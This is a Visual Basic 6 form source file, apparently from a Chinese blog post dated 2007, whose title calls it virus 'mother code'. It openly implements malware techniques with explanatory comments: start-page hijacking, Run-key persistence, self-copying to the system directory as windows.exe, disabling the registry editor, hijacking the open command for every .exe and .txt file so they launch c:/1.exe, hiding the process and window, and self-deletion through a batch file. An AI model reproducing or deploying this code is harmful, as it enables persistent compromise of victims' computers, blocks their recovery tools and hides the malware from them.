VERSION 5.00
Begin VB.Form Form1
BorderStyle = 1 'Fixed Single
Caption = "6331905VB制造病毒母代码"
ClientHeight = 6630
ClientLeft = 45
ClientTop = 435
ClientWidth = 7815
Icon = "Form1.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 6630
ScaleWidth = 7815
StartUpPosition = 2 '屏幕中心
Begin VB.CommandButton Command14
Caption = "清除感染txt"
Height = 495
Left = 4440
TabIndex = 18
Top = 2880
Width = 975
End
Begin VB.CommandButton Command13
Caption = "清除感染exe"
Height = 495
Left = 4440
TabIndex = 17
Top = 2040
Width = 975
End
Begin VB.PictureBox Picture1
Appearance = 0 'Flat
BackColor = &H80000005&
ForeColor = &H80000008&
Height = 5655
Left = 5640
Picture = "Form1.frx":08FF
ScaleHeight = 5625
ScaleWidth = 1905
TabIndex = 16
Top = 840
Width = 1935
End
Begin VB.CommandButton Command12
Caption = "感染txt文件"
Height = 495
Left = 3120
TabIndex = 15
Top = 2880
Width = 1215
End
Begin VB.CommandButton Command11
Caption = "木马自删除"
Height = 495
Left = 3120
TabIndex = 14
Top = 5400
Width = 2295
End
Begin VB.CommandButton Command10
Caption = "隐藏应用程序"
Height = 495
Left = 600
TabIndex = 11
Top = 5400
Width = 1695
End
Begin VB.CommandButton Command9
Caption = "隐藏进程"
Height = 495
Left = 600
TabIndex = 10
Top = 4560
Width = 1695
End
Begin VB.CommandButton Command8
Caption = "修改默认键值"
Height = 495
Left = 3120
TabIndex = 8
Top = 4560
Width = 2295
End
Begin VB.CommandButton Command7
Caption = "修改非默认键值"
Height = 495
Left = 3120
TabIndex = 7
Top = 3720
Width = 2295
End
Begin VB.CommandButton Command6
Caption = "感染exe文件"
Height = 495
Left = 3120
TabIndex = 6
Top = 2040
Width = 1215
End
Begin VB.CommandButton Command5
Caption = "将程序复制到系统目录命名为windows.exe并且开机自启动"
Height = 855
Left = 3120
TabIndex = 5
Top = 840
Width = 2295
End
Begin VB.CommandButton Command4
Caption = "禁止访问注册表"
Height = 495
Left = 600
TabIndex = 4
Top = 3720
Width = 1695
End
Begin VB.CommandButton Command3
Caption = "可以访问注册表"
Height = 495
Left = 600
TabIndex = 3
Top = 2880
Width = 1695
End
Begin VB.CommandButton Command2
Caption = "开机自启动"
Height = 495
Left = 600
TabIndex = 2
Top = 2040
Width = 1695
End
Begin VB.TextBox Text1
Appearance = 0 'Flat
Height = 270
Left = 600
TabIndex = 1
Text = "**"
Top = 840
Width = 1695
End
Begin VB.CommandButton Command1
Caption = "修改主页"
Height = 495
Left = 600
TabIndex = 0
Top = 1200
Width = 1695
End
Begin VB.Label Label3
Caption = "写于2007.6.30日"
Height = 255
Left = 720
TabIndex = 13
Top = 6240
Width = 1455
End
Begin VB.Label Label2
Caption = "QQ:6331905"
BeginProperty Font
Name = "宋体"
Size = 18
Charset = 134
Weight = 700
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
ForeColor = &H000000FF&
Height = 375
Left = 3240
TabIndex = 12
Top = 6120
Width = 1935
End
Begin VB.Shape Shape1
BorderColor = &H80000000&
Height = 1085
Left = 480
Top = 720
Width = 1940
End
Begin VB.Label Label1
Caption = $"Form1.frx":6100
Height = 615
Left = 360
TabIndex = 9
Top = 120
Width = 7095
End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Option Explicit
Dim systempath As String
Private Sub Command1_Click() '修改主页
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Software/Microsoft/Internet Explorer/Main", hKey
RegSetValueEx hKey, "Start Page", 0, REG_SZ, ByVal Me.Text1.Text, 30
If Me.Text1.Text = "" Then
RegSetValueEx hKey, "Start Page", 0, REG_SZ, ByVal "about:blank", 30
RegCloseKey hKey
End If
End Sub
Private Sub Command10_Click()
App.TaskVisible = False '隐藏应用程序
End Sub
Private Sub Command11_Click()
Dim s As String
On Error Resume Next
s = CurDir '当前目录
'保证目录最后的字符为 "/"
If Right(s, 1) <> "/" Then
s = s & "/"
End If '在当前目录下创建bat文件
Open s & "kill.bat" For Output As #1
Print #1, ":redel"
Print #1, "del " & Chr(34) & s & App.EXEName & ".exe" & Chr(34)
Print #1, "if exist " & Chr(34) & s & App.EXEName & ".exe" & Chr(34) & " goto redel"
Print #1, "del %0"
Print #1,
Close #1
Shell Chr(34) & s & "kill.bat" & Chr(34)
End
End Sub
Private Sub Command12_Click() '感染txt文件,描述见下面感染exe文件,txt文件默认数据为C:/windows/notepad.exe %1
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "txtfile/shell/open/command/", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "C:/1.exe", 30
RegCloseKey hKey
Dim a As String
a = Command()
If a = "" Then
Else
Shell a, 1
End If
End Sub
Private Sub Command13_Click() '清除感染exe文件
Dim x As String
x = Chr$(34) + "%1" + Chr$(34) + Chr$(32) + "%*"
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "exefile/shell/open/command/", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal x, 30
RegCloseKey hKey
End Sub
Private Sub Command14_Click() '清除感染txt文件
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "txtfile/shell/open/command/", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "C:/windows/notepad.exe %1", 30
RegCloseKey hKey
Dim a As String
End Sub
'如果让程序开机运行,需要先把文件编译为可执行文件放到特定目录下,
'并修改注册表让其开机便运行,
'路径是/HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVerson/Run
Private Sub Command2_Click() '无论该文件放在什么位置都可以实现开机自启动
Dim hKey As Long, SubKey As String, Exe As String
SubKey = "Software/Microsoft/Windows/CurrentVersion/Run"
Exe = App.Path & "/" & App.EXEName & ".exe"
RegCreateKey HKEY_LOCAL_MACHINE, SubKey, hKey
RegSetValueEx hKey, "19911593", 0, REG_SZ, ByVal Exe, LenB(StrConv(Exe, vbFromUnicode)) + 1
RegCloseKey hKey
End Sub
'禁止修改注册表方法为:
'展开注册表到
'HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/System
'下,新建一个名为DisableRegistryTools的DWORD值,并将其值改为“1”,即可禁止使用注册表编辑器Regedit,"0"为可用
Private Sub Command3_Click() '可以使用注册表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Software/Microsoft/Windows/CurrentVersion/Policies/System", hKey
RegSetValueEx hKey, "DisableRegistryTools", 0, REG_DWORD, 0&, 4
'0&就是设置DWORD值为0,1&就是设置DWORD值为1
RegCloseKey hKey
End Sub
Private Sub Command4_Click() '禁止使用注册表
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Software/Microsoft/Windows/CurrentVersion/Policies/System", hKey
RegSetValueEx hKey, "DisableRegistryTools", 0, REG_DWORD, 1&, 4
RegCloseKey hKey
End Sub
Private Sub Command5_Click() '将程序复制到系统目录
systempath = String(255, Chr(0))
GetSystemDirectory systempath, 254
systempath = Left(systempath, InStr(systempath, Chr(0)) - 1)
'先检查系统目录有无windows.exe文件,如果没有,自我复制到系统目录命名为windows.exe
If Not Dir(systempath & "/" & "windows.exe") = "windows.exe" Then
FileCopy App.Path & "/" & App.EXEName & ".exe", systempath & "/" & "windows.exe"
End If
'以下为设置系统目录的windows.exe为开机自启动,名称为6331905,数据为windows.exe
Dim hKey As Long, SubKey As String, Exe As String
SubKey = "Software/Microsoft/Windows/CurrentVersion/Run"
Exe = (systempath & "/" & "windows.exe")
RegCreateKey HKEY_LOCAL_MACHINE, SubKey, hKey
RegSetValueEx hKey, "6331905", 0, REG_SZ, ByVal Exe, LenB(StrConv(Exe, vbFromUnicode)) + 1
RegCloseKey hKey
End Sub
'VB制作EXE文件关联,并运行指定文件,其实就是修改默认键值
'原理: 实现该程序主要是修改注册表的数据值
'1.在注册表HKEY_CLASSES_ROOT/exefile/shell/open/command/的默认数据值为"%1" %*
'该"%1" %*默认数据值控制着exe文件的打开
'2.只要修改默认数据值就可以实现文件关联
'比如,把"%1" %*修改为c:/1.exe %1,请大家在c:/放1个任何1.exe文件,看看运行
'你电脑里面的任何exe程序会发生什么效果
'说明:
'(1) "%1" %*则表示所有EXE文件本身直接运行(EXE 可以直接运行,
'所以用表示程序本身的%1即可),后面的%*则表示程序命令后带的所有参数
'(这就是为什么EXE文件可以带参数运行的原因)。
'(2) 1.exe %1,表示将所有文件类型为EXE(exefile表示为EXE类型文件)的
'文件都通过“记事本”程序打开,后面的%1表示要打开的程序本身(就是双击时的那个程序)。
Private Sub Command6_Click()
Dim hKey As Long
RegCreateKey HKEY_CLASSES_ROOT, "exefile/shell/open/command/", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "c:/1.exe %1", 30
RegCloseKey hKey
Dim a As String '定义一个字符变量,用来存放当前文件的绝对路径
a = Command() '将绝对路径存放到变量a中
If a = "" Then '如果a的路径为空,则什么都不执行
Else '否则执行程序
Shell a, 1 '这是打开变量a指定路径的文件,运行参数为默认
End If
End Sub
Private Sub Command7_Click() '修改HKEY_CURRENT_USER/Console/FaceNamed的键值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Console/", hKey
RegSetValueEx hKey, "FaceName", 0, REG_SZ, ByVal "16697000", 30
RegCloseKey hKey
End Sub
Private Sub Command8_Click() '修改HKEY_CURRENT_USER/Console的默认键值
Dim hKey As Long
RegCreateKey HKEY_CURRENT_USER, "Console/", hKey
RegSetValueEx hKey, "", 0, REG_SZ, ByVal "16697000", 30
RegCloseKey hKey
End Sub
Private Sub Command9_Click() '该隐藏进程方法在原版XP2上通过,在雨林木风GHOST版本未通过,有研究的愿意交流
HideCurrentProcess '隐藏进程
End Sub
941
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
